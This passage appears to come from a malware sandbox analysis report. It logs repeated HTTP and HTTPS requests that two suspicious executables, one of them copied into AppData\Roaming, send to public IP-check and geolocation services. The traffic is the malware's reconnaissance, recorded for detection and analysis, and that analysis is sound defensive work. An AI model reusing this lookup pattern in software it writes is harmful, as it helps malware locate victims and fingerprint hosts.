
Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:28.280100107 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 5, 2024 18:51:29.852705002 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49772	132.226.8.169	80	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:31.566623926 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 5, 2024 18:51:32.983830929 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49773	132.226.8.169	80	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:31.660171032 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 5, 2024 18:51:33.077064991 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49781	132.226.8.169	80	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:34.801732063 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 5, 2024 18:51:36.251034975 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49782	132.226.8.169	80	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:34.888676882 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 5, 2024 18:51:36.586668015 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49796	132.226.8.169	80	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:38.474967957 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 5, 2024 18:51:39.896976948 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49803	132.226.8.169	80	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 18:51:41.706737995 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 5, 2024 18:51:43.116957903 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49705	104.21.67.152	443	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:12 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-05 17:51:12 UTC	880	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:12 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298495 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=drnbCvGadRHs9Qt%2Fyokln4fNJJidjFaF%2FcCeCH%2FrjE4F12e6krGeGliQhKmP2k1Ns0AveNx3F0FQP0Nz25LIJAvqReorbBgzFFqDDhIkxcsfpiYHBzmpBvBfAwX4Lp3%2FY1M%2B11BW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e2085eb6429e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2068&min_rtt=1744&rtt_var=886&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1674311&cwnd=198&unsent_bytes=0&cid=fe636cd752142aba&ts=491&x=0"
2024-12-05 17:51:12 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49707	104.21.67.152	443	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:14 UTC	61	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-05 17:51:15 UTC	884	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:14 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298497 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PFa4FUxNx8D1OJbWNf3VwE3xXEX41UfTNfmK1FvJre1jYrhMUIQ0MxPQr1%2BqaJTH8G0qFfUL52xdSj%2BZpQd9UB17CuU1%2Fv3WZ1umBekX7v%2B%2BG%2FMJQFq89WfO5oxjupN8m%2ByKUFth"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e21658bd8c72-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2232&min_rtt=2118&rtt_var=876&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1378659&cwnd=174&unsent_bytes=0&cid=1fa1fad02aa372f1&ts=480&x=0"
2024-12-05 17:51:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49715	104.21.67.152	443	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:17 UTC	61	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-05 17:51:18 UTC	876	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298501 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ebX53HzmhYNOaT5hFKzuCMVzILqdR4EoRPUwPGdD7YVzOVtzp%2BDNUerseDRsP10HB3tJ54GZz2drOCG2m%2BEeNYaac8qn7LUipPe7G8c5zkI18wvA1q13cZglkwHso%2FfYvVDHCcNg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e22aaebd41ef-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1740&rtt_var=676&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1678160&cwnd=192&unsent_bytes=0&cid=0a981e3186b7e447&ts=472&x=0"
2024-12-05 17:51:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49716	104.21.67.152	443	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:19 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-05 17:51:19 UTC	876	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298502 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q6s5SPI7xYBOtF4nfgxtkT2eqzQRGGXTFby72UiWfwf1xGWvt3w%2F3%2BIuSRE4VL2BVAX4JWS8KDbA0%2ByNyEF6DgQUPQH1kAjxLTBaKfhmGqNS6XzKlwZxEkKtbbaiV4gaeU5tZzuX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e2313e2fc484-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1708&rtt_var=648&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1709601&cwnd=248&unsent_bytes=0&cid=4c50adf03cdbfb33&ts=464&x=0"
2024-12-05 17:51:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49724	104.21.67.152	443	7728	C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:21 UTC	61	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-05 17:51:21 UTC	876	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298504 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zCgHjhmEg8U0dnTKaWLS90vlnY3x5QbyL6qHPnwu%2FiIkTwDj3OmeOUy%2F0B0RFsQzsnfDMUzkbeO4IJrtWCffGslUtQrvqkEbdpJKvfSpPM93fCNuPlhtTTs6nHh6mU3R%2FHTS29Hs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e23ecd27423e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1700&rtt_var=667&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1603514&cwnd=191&unsent_bytes=0&cid=cb009ea1e5817756&ts=467&x=0"
2024-12-05 17:51:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49730	104.21.67.152	443	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:21 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-05 17:51:21 UTC	876	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298504 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dYHlgWounLv%2FK1CVQbkrKMEuNAcvjnE5W91E7vL3xCFGRYK7tjkXXdPQwIm7%2F780yjpqbK7LgEjmH6OUAupC%2BMpfuUJlndLg4nQjHkerH7CJjEScmOyu4wFy4zYh1YxpHBwZVew9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e23eda844229-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1720&rtt_var=655&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1656267&cwnd=236&unsent_bytes=0&cid=777fa365d1134654&ts=481&x=0"
2024-12-05 17:51:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49742	104.21.67.152	443	7308	C:\Users\user\Desktop\Ti5nuRV7y4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 17:51:24 UTC	85	OUT	GET /xml/8.46.123.228 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-05 17:51:24 UTC	878	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 17:51:24 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 298507 Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hEEwSJ9Dy69ZL%2FViyRyBxtLvaeVHjoengLBFMK39mTLLn4nGoJ7WdWTwxoQ5XPUe32fV9MflQDRyO3ANOD%2F0FqLQJWaMTPeENSY8GGkeVns%2B1%2B3zoDPcFajeAz3yamJPSnHKur2o"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed5e25309c34228-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1672&rtt_var=641&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1687861&cwnd=205&unsent_bytes=0&cid=7fb4ca5e15a8216c&ts=479&x=0"
2024-12-05 17:51:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: 